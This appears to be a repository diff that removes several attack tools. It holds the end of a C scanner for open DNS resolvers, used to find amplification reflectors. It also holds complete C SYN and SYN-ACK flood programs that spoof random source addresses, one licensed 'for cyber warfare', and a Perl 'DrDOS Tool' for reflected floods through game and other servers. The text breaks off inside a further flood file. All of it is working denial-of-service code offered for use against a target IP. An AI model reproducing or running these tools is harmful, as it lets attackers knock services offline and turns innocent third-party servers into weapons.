||||||
int body_length = data_size - iphdrlen - 8;
|
|
||||||
struct DNS_HEADER *dns = (struct DNS_HEADER*) payload;
|
|
||||||
if(dns->ra == 1)
|
|
||||||
{
|
|
||||||
found_srvs++;
|
|
||||||
fprintf(fd,"%s . %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
|
||||||
fflush(fd);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
}
|
|
||||||
close(sock_raw);
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
|
|
||||||
if(argc < 6){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <class a start> <class a end> <outfile> <threads> <scan delay in ms>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
fd = fopen(argv[3], "a");
|
|
||||||
sleep_between = atoi(argv[5]);
|
|
||||||
|
|
||||||
signal(SIGINT, &sighandler);
|
|
||||||
|
|
||||||
int threads = atoi(argv[4]);
|
|
||||||
pthread_t thread;
|
|
||||||
|
|
||||||
pthread_t listenthread;
|
|
||||||
pthread_create( &listenthread, NULL, &recievethread, NULL);
|
|
||||||
|
|
||||||
char *str_start = malloc(18);
|
|
||||||
memset(str_start, 0, 18);
|
|
||||||
str_start = strcat(str_start,argv[1]);
|
|
||||||
str_start = strcat(str_start,".0.0.0");
|
|
||||||
char *str_end = malloc(18);
|
|
||||||
memset(str_end, 0, 18);
|
|
||||||
str_end = strcat(str_end,argv[2]);
|
|
||||||
str_end = strcat(str_end,".255.255.255");
|
|
||||||
start = inet_addr(str_start);
|
|
||||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
|
||||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
|
||||||
int i;
|
|
||||||
for(i = 0;i<threads;i++){
|
|
||||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
|
||||||
}
|
|
||||||
sleep(1);
|
|
||||||
printf("Starting Scan...\n");
|
|
||||||
char *temp = (char *)malloc(17);
|
|
||||||
memset(temp, 0, 17);
|
|
||||||
sprintf(temp, "Found");
|
|
||||||
printf("%-16s", temp);
|
|
||||||
memset(temp, 0, 17);
|
|
||||||
sprintf(temp, "Host/s");
|
|
||||||
printf("%-16s", temp);
|
|
||||||
memset(temp, 0, 17);
|
|
||||||
sprintf(temp, "B/s");
|
|
||||||
printf("%-16s", temp);
|
|
||||||
memset(temp, 0, 17);
|
|
||||||
sprintf(temp, "Running Thrds");
|
|
||||||
printf("%-16s", temp);
|
|
||||||
memset(temp, 0, 17);
|
|
||||||
sprintf(temp, "Done");
|
|
||||||
printf("%s", temp);
|
|
||||||
printf("\n");
|
|
||||||
|
|
||||||
char *new;
|
|
||||||
new = (char *)malloc(16*6);
|
|
||||||
while (running_threads > 0)
|
|
||||||
{
|
|
||||||
printf("\r");
|
|
||||||
memset(new, '\0', 16*6);
|
|
||||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
|
||||||
sprintf(new, "%s|%-15d", new, scanned);
|
|
||||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
|
||||||
sprintf(new, "%s|%-15d", new, running_threads);
|
|
||||||
memset(temp, 0, 17);
|
|
||||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
|
||||||
sprintf(temp, "%d%%", percent_done);
|
|
||||||
sprintf(new, "%s|%s", new, temp);
|
|
||||||
printf("%s", new);
|
|
||||||
fflush(stdout);
|
|
||||||
bytes_sent=0;
|
|
||||||
scanned = 0;
|
|
||||||
sleep(1);
|
|
||||||
}
|
|
||||||
printf("\n");
|
|
||||||
fclose(fd);
|
|
||||||
return 0;
|
|
||||||
}
|
|
@ -1,197 +0,0 @@
|
|||||||
/*
|
|
||||||
This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
|
|
||||||
*/
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <time.h>
|
|
||||||
#include <sys/types.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <sys/ioctl.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <pthread.h>
|
|
||||||
#include <netinet/tcp.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/in.h>
|
|
||||||
#include <netinet/if_ether.h>
|
|
||||||
#include <netdb.h>
|
|
||||||
#include <net/if.h>
|
|
||||||
#include <arpa/inet.h>
|
|
||||||
#define MAX_PACKET_SIZE 4096
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
static unsigned long int Q[4096], c = 362436;
|
|
||||||
static unsigned int floodport;
|
|
||||||
volatile int limiter;
|
|
||||||
volatile unsigned int pps;
|
|
||||||
volatile unsigned int sleeptime = 100;
|
|
||||||
void init_rand(unsigned long int x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
|
||||||
}
|
|
||||||
unsigned long int rand_cmwc(void)
|
|
||||||
{
|
|
||||||
unsigned long long int t, a = 18782LL;
|
|
||||||
static unsigned long int i = 4095;
|
|
||||||
unsigned long int x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
unsigned short csum (unsigned short *buf, int count)
|
|
||||||
{
|
|
||||||
register unsigned long sum = 0;
|
|
||||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
|
||||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
|
||||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
|
||||||
|
|
||||||
struct tcp_pseudo
|
|
||||||
{
|
|
||||||
unsigned long src_addr;
|
|
||||||
unsigned long dst_addr;
|
|
||||||
unsigned char zero;
|
|
||||||
unsigned char proto;
|
|
||||||
unsigned short length;
|
|
||||||
} pseudohead;
|
|
||||||
unsigned short total_len = iph->tot_len;
|
|
||||||
pseudohead.src_addr=iph->saddr;
|
|
||||||
pseudohead.dst_addr=iph->daddr;
|
|
||||||
pseudohead.zero=0;
|
|
||||||
pseudohead.proto=IPPROTO_TCP;
|
|
||||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
|
||||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
|
||||||
unsigned short *tcp = malloc(totaltcp_len);
|
|
||||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
|
||||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
|
||||||
unsigned short output = csum(tcp,totaltcp_len);
|
|
||||||
free(tcp);
|
|
||||||
return output;
|
|
||||||
}
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
|
||||||
iph->id = htonl(54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = 6;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr("192.168.3.100");
|
|
||||||
}
|
|
||||||
void setup_tcp_header(struct tcphdr *tcph)
|
|
||||||
{
|
|
||||||
tcph->source = htons(5678);
|
|
||||||
tcph->seq = rand();
|
|
||||||
tcph->ack_seq = 1;
|
|
||||||
tcph->res2 = 3;
|
|
||||||
tcph->doff = 5;
|
|
||||||
tcph->syn = 1;
|
|
||||||
tcph->window = htons(65535);
|
|
||||||
tcph->check = 1;
|
|
||||||
tcph->urg_ptr = 1;
|
|
||||||
}
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
char *td = (char *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_port = htons (rand() % 2048);
|
|
||||||
sin.sin_addr.s_addr = inet_addr(td);
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, "derped.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_tcp_header(tcph);
|
|
||||||
tcph->dest = htons (rand() % 2048);
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, "Unable to allocate.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
init_rand(time(NULL));
|
|
||||||
register unsigned int i;
|
|
||||||
i = 0;
|
|
||||||
while(1){
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
|
||||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
|
||||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->check = tcpcsum(iph, tcph);
|
|
||||||
pps++;
|
|
||||||
if(i >= limiter)
|
|
||||||
{
|
|
||||||
i = 0;
|
|
||||||
usleep(sleeptime);
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 5){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Setting up Sockets...\n");
|
|
||||||
int num_threads = atoi(argv[2]);
|
|
||||||
int maxpps = atoi(argv[3]);
|
|
||||||
limiter = 0;
|
|
||||||
pps = 0;
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
int multiplier = 20;
|
|
||||||
int i;
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Starting Flood...\n");
|
|
||||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
|
||||||
{
|
|
||||||
usleep((1000/multiplier)*1000);
|
|
||||||
if((pps*multiplier) > maxpps)
|
|
||||||
{
|
|
||||||
if(1 > limiter)
|
|
||||||
{
|
|
||||||
sleeptime+=100;
|
|
||||||
} else {
|
|
||||||
limiter--;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
limiter++;
|
|
||||||
if(sleeptime > 25)
|
|
||||||
{
|
|
||||||
sleeptime-=25;
|
|
||||||
} else {
|
|
||||||
sleeptime = 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
pps = 0;
|
|
||||||
}
|
|
||||||
return 0;
|
|
||||||
}
|
|
@ -1,219 +0,0 @@
|
|||||||
#!/usr/bin/perl -w
|
|
||||||
|
|
||||||
use Benchmark;
|
|
||||||
use Net::RawIP;
|
|
||||||
use Time::HiRes qw ( usleep );
|
|
||||||
|
|
||||||
my $rand = int( rand 0x400 );
|
|
||||||
my $frag = 0;
|
|
||||||
my $doff = 0x05;
|
|
||||||
my $ttl = 0xFF;
|
|
||||||
my $tos = 0x08;
|
|
||||||
my $pid;
|
|
||||||
my $tx;
|
|
||||||
my @list;
|
|
||||||
my @running;
|
|
||||||
my @pids;
|
|
||||||
|
|
||||||
my %attack =
|
|
||||||
( "tcp" => \&tcp, "quake3" => \&quake3, "source" => \&source, "hl" => \&hl, "gs" => \&gs, "gs2" => \&gs2 );
|
|
||||||
|
|
||||||
if ( @ARGV < 7 || @ARGV > 7 ) {
|
|
||||||
&usage();
|
|
||||||
exit;
|
|
||||||
}
|
|
||||||
|
|
||||||
$tx = $ARGV[3];
|
|
||||||
my $t0 = new Benchmark;
|
|
||||||
|
|
||||||
print "\n*** Now Reading Hosts Into Array\n\n";
|
|
||||||
|
|
||||||
open( ELITE, $ARGV[2] ) || die "Unable to open $ARGV[2]!\n";
|
|
||||||
chomp( @list = <ELITE> );
|
|
||||||
close(ELITE);
|
|
||||||
|
|
||||||
sub tcp {
|
|
||||||
my ( $ip, $port ) = @_;
|
|
||||||
my $a = new Net::RawIP(
|
|
||||||
{
|
|
||||||
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl },
|
|
||||||
tcp => {
|
|
||||||
dest => $port,
|
|
||||||
source => $ARGV[1],
|
|
||||||
syn => 1,
|
|
||||||
ack => 0,
|
|
||||||
fin => 0,
|
|
||||||
rst => 0,
|
|
||||||
psh => 0,
|
|
||||||
urg => 0,
|
|
||||||
doff => $doff
|
|
||||||
}
|
|
||||||
}
|
|
||||||
);
|
|
||||||
$a->send( 0, $tx );
|
|
||||||
}
|
|
||||||
|
|
||||||
sub quake3 {
|
|
||||||
my ( $ip, $port ) = @_;
|
|
||||||
my $a = new Net::RawIP(
|
|
||||||
{
|
|
||||||
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
|
|
||||||
udp => {
|
|
||||||
dest => $port,
|
|
||||||
source => $ARGV[1],
|
|
||||||
data => chr(255) . chr(255) . chr(255) . chr(255) . "getstatus" . chr(10),
|
|
||||||
}
|
|
||||||
}
|
|
||||||
);
|
|
||||||
$a->send( 0, $tx );
|
|
||||||
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
sub source {
|
|
||||||
my ( $ip, $port ) = @_;
|
|
||||||
my $a = new Net::RawIP(
|
|
||||||
{
|
|
||||||
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
|
|
||||||
udp => { dest => $port, source => $ARGV[1], data => chr(255) . chr(255) . chr(255) . chr(255) . chr(85), }
|
|
||||||
}
|
|
||||||
);
|
|
||||||
$a->send( 0, $tx );
|
|
||||||
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
sub hl {
|
|
||||||
my ( $ip, $port ) = @_;
|
|
||||||
my $a = new Net::RawIP(
|
|
||||||
{
|
|
||||||
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
|
|
||||||
udp => { dest => $port, source => $ARGV[1], data => chr(255) . chr(255) . chr(255) . chr(255) . "rules", }
|
|
||||||
}
|
|
||||||
);
|
|
||||||
$a->send( 0, $tx );
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
sub gs {
|
|
||||||
my ( $ip, $port ) = @_;
|
|
||||||
my $a = new Net::RawIP(
|
|
||||||
{
|
|
||||||
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
|
|
||||||
udp => {
|
|
||||||
dest => $port,
|
|
||||||
source => $ARGV[1],
|
|
||||||
data => chr(92) . chr(115) . chr(116) . chr(97) . chr(116) . chr(117) . chr(115) . chr(92),
|
|
||||||
}
|
|
||||||
}
|
|
||||||
);
|
|
||||||
$a->send( 0, $tx );
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
sub gs2 {
|
|
||||||
my ( $ip, $port ) = @_;
|
|
||||||
my $a = new Net::RawIP(
|
|
||||||
{
|
|
||||||
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
|
|
||||||
udp => {
|
|
||||||
dest => $port,
|
|
||||||
source => $ARGV[1],
|
|
||||||
data => chr(254)
|
|
||||||
. chr(253)
|
|
||||||
. chr(0)
|
|
||||||
. chr(67)
|
|
||||||
. chr(79)
|
|
||||||
. chr(82)
|
|
||||||
. chr(89)
|
|
||||||
. chr(255)
|
|
||||||
. chr(255)
|
|
||||||
. chr(255),
|
|
||||||
}
|
|
||||||
}
|
|
||||||
);
|
|
||||||
$a->send( 0, $tx );
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
sub paxor {
|
|
||||||
my $type = $_[0];
|
|
||||||
unless ( $type eq "mixed" ) {
|
|
||||||
while (1) {
|
|
||||||
foreach (@list) { $attack{$type}->( split( ':', $_ ) );}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
my @part;
|
|
||||||
while (1) {
|
|
||||||
foreach (@list) {
|
|
||||||
@part = split( ":", $_ );
|
|
||||||
$attack{ $part[2] }->( $part[0], $part[1]);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
for($number = 0;$number < $ARGV[5];$number++)
|
|
||||||
{
|
|
||||||
$pid = fork();
|
|
||||||
if ( $pid == 0 ) {
|
|
||||||
$SIG{INT} = \&controlsub;
|
|
||||||
|
|
||||||
&paxor( $ARGV[4] );
|
|
||||||
|
|
||||||
my $t1 = new Benchmark;
|
|
||||||
my $td = timediff( $t1, $t0 );
|
|
||||||
print "\nTotal Time: ", timestr($td), "\n";
|
|
||||||
sleep(5);
|
|
||||||
exit;
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
push(@pids, $pid);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
sleep( $ARGV[6] );
|
|
||||||
foreach(@pids)
|
|
||||||
{
|
|
||||||
kill( "INT", $_ );
|
|
||||||
}
|
|
||||||
exit;
|
|
||||||
|
|
||||||
sub controlme {
|
|
||||||
$SIG{INT} = \&controlme;
|
|
||||||
print "Signal Caught Now Exiting\n";
|
|
||||||
my $t1 = new Benchmark;
|
|
||||||
my $td = timediff( $t1, $t0 );
|
|
||||||
print "\nTotal Time: ", timestr($td), "\n";
|
|
||||||
sleep(5);
|
|
||||||
exit;
|
|
||||||
}
|
|
||||||
|
|
||||||
sub controlsub {
|
|
||||||
$SIG{INT} = \&controlsub;
|
|
||||||
exit;
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
sub usage {
|
|
||||||
print << "HEREDOC";
|
|
||||||
$0 <target> <target port> <reflector list> <weight> <attack type> <threads> <Time>
|
|
||||||
DrDOS Tool V1.8 FINAL by ohnoes1479
|
|
||||||
|
|
||||||
Time: Limit running time of the script, Time is in seconds
|
|
||||||
threads: number of threads to run
|
|
||||||
attack types:
|
|
||||||
tcp: reflected tcp SYN attack
|
|
||||||
quake3: reflected udp attack using quake3 based servers
|
|
||||||
source: reflected udp attack using Valve Source based servers
|
|
||||||
hl: reflected udp attack using Half Life servers
|
|
||||||
gs: reflected udp attack using Gamespy based servers
|
|
||||||
gs2: reflected udp attack using Gamespy 2 based servers
|
|
||||||
mixed: specify type of server in list, EG:
|
|
||||||
8.8.8.8:80:tcp
|
|
||||||
64.120.46.100:28960:quake3
|
|
||||||
Command: $0 127.0.0.1 8080 servers.txt 5 tcp
|
|
||||||
HEREDOC
|
|
||||||
|
|
||||||
}
|
|
@ -1,200 +0,0 @@
|
|||||||
/*
|
|
||||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
|
||||||
*/
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <time.h>
|
|
||||||
#include <sys/types.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <sys/ioctl.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <pthread.h>
|
|
||||||
#include <netinet/tcp.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/in.h>
|
|
||||||
#include <netinet/if_ether.h>
|
|
||||||
#include <netdb.h>
|
|
||||||
#include <net/if.h>
|
|
||||||
#include <arpa/inet.h>
|
|
||||||
#define MAX_PACKET_SIZE 4096
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
static unsigned long int Q[4096], c = 362436;
|
|
||||||
static unsigned int floodport;
|
|
||||||
volatile int limiter;
|
|
||||||
volatile unsigned int pps;
|
|
||||||
volatile unsigned int sleeptime = 100;
|
|
||||||
void init_rand(unsigned long int x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
|
||||||
}
|
|
||||||
unsigned long int rand_cmwc(void)
|
|
||||||
{
|
|
||||||
unsigned long long int t, a = 18782LL;
|
|
||||||
static unsigned long int i = 4095;
|
|
||||||
unsigned long int x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
unsigned short csum (unsigned short *buf, int count)
|
|
||||||
{
|
|
||||||
register unsigned long sum = 0;
|
|
||||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
|
||||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
|
||||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
|
||||||
struct tcp_pseudo
|
|
||||||
{
|
|
||||||
unsigned long src_addr;
|
|
||||||
unsigned long dst_addr;
|
|
||||||
unsigned char zero;
|
|
||||||
unsigned char proto;
|
|
||||||
unsigned short length;
|
|
||||||
} pseudohead;
|
|
||||||
unsigned short total_len = iph->tot_len;
|
|
||||||
pseudohead.src_addr=iph->saddr;
|
|
||||||
pseudohead.dst_addr=iph->daddr;
|
|
||||||
pseudohead.zero=0;
|
|
||||||
pseudohead.proto=IPPROTO_TCP;
|
|
||||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
|
||||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
|
||||||
unsigned short *tcp = malloc(totaltcp_len);
|
|
||||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
|
||||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
|
||||||
unsigned short output = csum(tcp,totaltcp_len);
|
|
||||||
free(tcp);
|
|
||||||
return output;
|
|
||||||
}
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
|
||||||
iph->id = htonl(54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = 6;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr("192.168.3.100");
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_tcp_header(struct tcphdr *tcph)
|
|
||||||
{
|
|
||||||
tcph->source = htons(5678);
|
|
||||||
tcph->seq = rand();
|
|
||||||
tcph->ack_seq = rand();
|
|
||||||
tcph->res2 = 0;
|
|
||||||
tcph->doff = 5;
|
|
||||||
tcph->syn = 1;
|
|
||||||
tcph->ack = 1;
|
|
||||||
tcph->window = rand();
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->urg_ptr = 0;
|
|
||||||
}
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
char *td = (char *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_port = htons(floodport);
|
|
||||||
sin.sin_addr.s_addr = inet_addr(td);
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, "Could not open raw socket.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_tcp_header(tcph);
|
|
||||||
tcph->dest = htons(floodport);
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
init_rand(time(NULL));
|
|
||||||
register unsigned int i;
|
|
||||||
i = 0;
|
|
||||||
while(1){
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
|
||||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
|
||||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->check = tcpcsum(iph, tcph);
|
|
||||||
pps++;
|
|
||||||
if(i >= limiter)
|
|
||||||
{
|
|
||||||
i = 0;
|
|
||||||
usleep(sleeptime);
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 6){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Setting up Sockets...\n");
|
|
||||||
int num_threads = atoi(argv[3]);
|
|
||||||
floodport = atoi(argv[2]);
|
|
||||||
int maxpps = atoi(argv[4]);
|
|
||||||
limiter = 0;
|
|
||||||
pps = 0;
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
int multiplier = 20;
|
|
||||||
int i;
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Starting Flood...\n");
|
|
||||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
|
||||||
{
|
|
||||||
usleep((1000/multiplier)*1000);
|
|
||||||
if((pps*multiplier) > maxpps)
|
|
||||||
{
|
|
||||||
if(1 > limiter)
|
|
||||||
{
|
|
||||||
sleeptime+=100;
|
|
||||||
} else {
|
|
||||||
limiter--;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
limiter++;
|
|
||||||
if(sleeptime > 25)
|
|
||||||
{
|
|
||||||
sleeptime-=25;
|
|
||||||
} else {
|
|
||||||
sleeptime = 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
pps = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
return 0;
|
|
||||||
}
|
|
@ -1,218 +0,0 @@
|
|||||||
/*
|
|
||||||
This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
|
|
||||||
*/
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <time.h>
|
|
||||||
#include <sys/types.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <sys/ioctl.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <pthread.h>
|
|
||||||
#include <netinet/tcp.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/in.h>
|
|
||||||
#include <netinet/if_ether.h>
|
|
||||||
